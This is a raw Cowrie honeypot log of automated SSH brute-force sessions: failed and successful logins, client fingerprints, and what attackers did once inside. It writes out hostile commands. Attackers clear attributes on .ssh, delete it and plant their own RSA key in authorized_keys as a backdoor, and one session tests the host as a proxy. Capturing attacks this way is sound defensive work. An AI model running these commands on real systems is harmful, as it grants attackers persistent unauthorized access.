{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:08:33.769544Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:08:33.770484Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:08:33.771678Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:34.016162Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:08:34.994633Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T07:08:34.995346Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T07:08:35.240535Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:35.241623Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59530,"dst_ip":"1.2.3.4","dst_port":22,"session":"7761bd5851b8","protocol":"ssh","message":"New connection: 212.227.235.229:59530 (1.2.3.4:22) [session: 7761bd5851b8]","sensor":"my-vps","timestamp":"2025-09-09T07:08:35.485062Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:08:35.485936Z","src_ip":"212.227.235.229","session":"7761bd5851b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:08:35.729737Z","src_ip":"212.227.235.229","session":"7761bd5851b8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T07:08:37.299676Z","src_ip":"212.227.235.229","session":"7761bd5851b8"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:38.546609Z","src_ip":"212.227.235.229","session":"7761bd5851b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60147,"dst_ip":"1.2.3.4","dst_port":22,"session":"dac8d61cc399","protocol":"ssh","message":"New connection: 212.227.235.229:60147 (1.2.3.4:22) [session: dac8d61cc399]","sensor":"my-vps","timestamp":"2025-09-09T07:08:38.787660Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:08:38.788445Z","src_ip":"212.227.235.229","session":"dac8d61cc399"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:08:39.031467Z","src_ip":"212.227.235.229","session":"dac8d61cc399"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:08:40.677055Z","src_ip":"212.227.235.229","session":"dac8d61cc399"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:40.920845Z","src_ip":"212.227.235.229","session":"e2dfe1216fb1"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:40.922072Z","src_ip":"212.227.235.229","session":"dac8d61cc399"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.66.114","src_port":56894,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c070766e618","protocol":"ssh","message":"New connection: 196.251.66.114:56894 (1.2.3.4:22) [session: 5c070766e618]","sensor":"my-vps","timestamp":"2025-09-09T07:08:52.889902Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_3.4.0","message":"Remote SSH version: SSH-2.0-paramiko_3.4.0","sensor":"my-vps","timestamp":"2025-09-09T07:08:52.897506Z","src_ip":"196.251.66.114","session":"5c070766e618"}
{"eventid":"cowrie.client.kex","hassh":"87e3d9ffee0540b0390f8a5b9c343c08","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 87e3d9ffee0540b0390f8a5b9c343c08","sensor":"my-vps","timestamp":"2025-09-09T07:08:53.240834Z","src_ip":"196.251.66.114","session":"5c070766e618"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pass","message":"login attempt [admin/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T07:08:53.342579Z","src_ip":"196.251.66.114","session":"5c070766e618"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.66.114","src_port":56898,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc10f7a350ee","protocol":"ssh","message":"New connection: 196.251.66.114:56898 (1.2.3.4:22) [session: bc10f7a350ee]","sensor":"my-vps","timestamp":"2025-09-09T07:08:54.401255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_3.4.0","message":"Remote SSH version: SSH-2.0-paramiko_3.4.0","sensor":"my-vps","timestamp":"2025-09-09T07:08:54.410326Z","src_ip":"196.251.66.114","session":"bc10f7a350ee"}
{"eventid":"cowrie.client.kex","hassh":"87e3d9ffee0540b0390f8a5b9c343c08","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 87e3d9ffee0540b0390f8a5b9c343c08","sensor":"my-vps","timestamp":"2025-09-09T07:08:54.437719Z","src_ip":"196.251.66.114","session":"bc10f7a350ee"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:54.460312Z","src_ip":"196.251.66.114","session":"5c070766e618"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1111111","message":"login attempt [admin/1111111] failed","sensor":"my-vps","timestamp":"2025-09-09T07:08:54.778111Z","src_ip":"196.251.66.114","session":"bc10f7a350ee"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.66.114","src_port":56912,"dst_ip":"1.2.3.4","dst_port":22,"session":"5eb495d58e31","protocol":"ssh","message":"New connection: 196.251.66.114:56912 (1.2.3.4:22) [session: 5eb495d58e31]","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.049071Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-paramiko_3.4.0","message":"Remote SSH version: SSH-2.0-paramiko_3.4.0","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.071055Z","src_ip":"196.251.66.114","session":"5eb495d58e31"}
{"eventid":"cowrie.client.kex","hassh":"87e3d9ffee0540b0390f8a5b9c343c08","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-cbc,aes192-cbc,aes256-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-md5,hmac-sha1-96,hmac-md5-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-cbc","aes192-cbc","aes256-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-md5","hmac-sha1-96","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 87e3d9ffee0540b0390f8a5b9c343c08","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.085147Z","src_ip":"196.251.66.114","session":"5eb495d58e31"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.143767Z","src_ip":"196.251.66.114","session":"bc10f7a350ee"}
{"eventid":"cowrie.login.success","username":"root","password":"pass","message":"login attempt [root/pass] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.188405Z","src_ip":"196.251.66.114","session":"5eb495d58e31"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"104.16.185.241","dst_port":80,"src_ip":"196.251.66.114","src_port":0,"message":"direct-tcp connection request to 104.16.185.241:80 from :0","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.207906Z","session":"5eb495d58e31"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"104.16.185.241","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: icanhazip.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 104.16.185.241:80 with data b'GET / HTTP/1.0\\r\\nHost: icanhazip.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.223532Z","src_ip":"196.251.66.114","session":"5eb495d58e31"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:08:56.344427Z","src_ip":"196.251.66.114","session":"5eb495d58e31"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43429,"dst_ip":"1.2.3.4","dst_port":22,"session":"2742ab918fbb","protocol":"ssh","message":"New connection: 212.227.235.229:43429 (1.2.3.4:22) [session: 2742ab918fbb]","sensor":"my-vps","timestamp":"2025-09-09T07:09:46.594006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:09:46.594923Z","src_ip":"212.227.235.229","session":"2742ab918fbb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:09:46.836851Z","src_ip":"212.227.235.229","session":"2742ab918fbb"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"qwerty","message":"login attempt [testnet/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T07:09:47.847357Z","src_ip":"212.227.235.229","session":"2742ab918fbb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:09:49.092352Z","src_ip":"212.227.235.229","session":"2742ab918fbb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:09:50.820439Z","src_ip":"212.227.125.160","session":"59c594e32127"}
{"eventid":"cowrie.session.closed","duration":180.1409454345703,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:09:50.825384Z","src_ip":"212.227.125.160","session":"59c594e32127"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56289,"dst_ip":"1.2.3.4","dst_port":22,"session":"2875140424fc","protocol":"ssh","message":"New connection: 212.227.235.229:56289 (1.2.3.4:22) [session: 2875140424fc]","sensor":"my-vps","timestamp":"2025-09-09T07:11:00.990638Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T07:11:00.991921Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T07:11:01.235454Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Hik12345","message":"login attempt [root/Hik12345] succeeded","sensor":"my-vps","timestamp":"2025-09-09T07:11:02.249836Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:11:02.786055Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:11:02.786789Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T07:11:02.787946Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T07:11:03.030930Z","src_ip":"212.227.235.229","session":"2875140424fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T07:11:03.571398Z","src_ip":"212.227.235.229","session":"2875140424fc"}
